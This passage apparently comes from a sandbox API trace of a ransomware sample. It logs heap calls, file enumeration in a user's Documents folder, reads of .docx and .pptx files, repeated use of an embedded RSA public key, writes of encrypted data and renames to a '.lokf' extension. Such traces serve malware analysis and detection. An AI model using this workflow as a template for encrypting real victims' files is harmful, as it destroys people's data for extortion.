[0058.854] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0058.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.854] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0058.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1f0 | out: hHeap=0x660000) returned 1 [0058.854] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b1f0 [0058.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.854] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0058.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.854] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0058.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.854] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0058.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.854] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3296fa8 [0058.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.854] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0058.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1f0 | out: hHeap=0x660000) returned 1 [0058.854] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0058.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0058.855] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x32679f8 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3292fe8 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32679f8 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296fa8 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b220 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b208 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1d8 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1c0 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82b60 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3282810 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32619a0 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0058.855] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c83710*, nNumberOfBytesToWrite=0x1615e, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c83710*, lpNumberOfBytesWritten=0x9f4fb14*=0x1615e, lpOverlapped=0x0) returned 1 [0058.856] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c83710 | out: hHeap=0x660000) returned 1 [0058.856] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x16163, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.856] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.858] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bcd8 [0058.858] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.858] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.858] CloseHandle (hObject=0x5cc) returned 1 [0058.859] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dY6y1t7mu6jrMGEl.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dy6y1t7mu6jrmgel.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dY6y1t7mu6jrMGEl.pptx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dy6y1t7mu6jrmgel.pptx.lokf")) returned 1 [0058.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.860] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0058.861] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef941140, ftCreationTime.dwHighDateTime=0x1d585b9, ftLastAccessTime.dwLowDateTime=0x5e581db0, ftLastAccessTime.dwHighDateTime=0x1d59172, ftLastWriteTime.dwLowDateTime=0x5e581db0, ftLastWriteTime.dwHighDateTime=0x1d59172, nFileSizeHigh=0x0, nFileSizeLow=0xb8cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e3Nt7XYdwW.docx", cAlternateFileName="E3NT7X~1.DOC")) returned 1 [0058.861] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e3Nt7XYdwW.docx") returned=".docx" [0058.861] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e3Nt7XYdwW.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e3nt7xydww.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.861] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=47308) returned 1 [0058.861] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.863] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb8a6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.864] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.864] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xb8cc, lpOverlapped=0x0) returned 1 [0058.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.865] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.865] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.865] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.865] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.866] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.866] GetLastError () returned 0x0 [0058.866] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.866] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.866] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.866] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.866] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.866] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.866] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.866] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.866] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb8cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.866] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.867] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.867] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bcd8 [0058.867] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0058.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0058.867] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0058.867] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.867] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bcd8 | out: hHeap=0x660000) returned 1 [0058.867] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0058.867] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.868] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.868] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.868] CloseHandle (hObject=0x5cc) returned 1 [0058.868] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269658 [0058.868] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0058.868] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269658 | out: hHeap=0x660000) returned 1 [0058.868] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e3Nt7XYdwW.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e3nt7xydww.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e3Nt7XYdwW.docx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e3nt7xydww.docx.lokf")) returned 1 [0058.869] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.869] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.869] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.870] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0058.870] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437af540, ftCreationTime.dwHighDateTime=0x1d593ab, ftLastAccessTime.dwLowDateTime=0xb77094b0, ftLastAccessTime.dwHighDateTime=0x1d51a42, ftLastWriteTime.dwLowDateTime=0xb77094b0, ftLastWriteTime.dwHighDateTime=0x1d51a42, nFileSizeHigh=0x0, nFileSizeLow=0x11def, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fyZw8q.pptx", cAlternateFileName="FYZW8Q~1.PPT")) returned 1 [0058.870] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bcd8 [0058.870] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adb18 [0058.870] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bcd8 | out: hHeap=0x660000) returned 1 [0058.870] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fyZw8q.pptx") returned=".pptx" [0058.870] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fyZw8q.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fyzw8q.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.870] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=73199) returned 1 [0058.870] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.872] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11dc9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.873] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.873] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.873] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.873] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.873] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x11def, lpOverlapped=0x0) returned 1 [0058.874] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.874] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.874] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.874] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.874] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.874] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.874] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.874] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.874] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.874] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.875] GetLastError () returned 0x0 [0058.875] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.875] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.875] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.875] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.875] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.875] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.875] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11df0) returned 0x9c83710 [0058.875] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.875] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0058.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c82ba8 [0058.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b1d8 [0058.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c82bf0 [0058.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b1f0 [0058.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b220 [0058.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b238 [0058.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0058.876] RtlReAllocateHeap (Heap=0x660000, 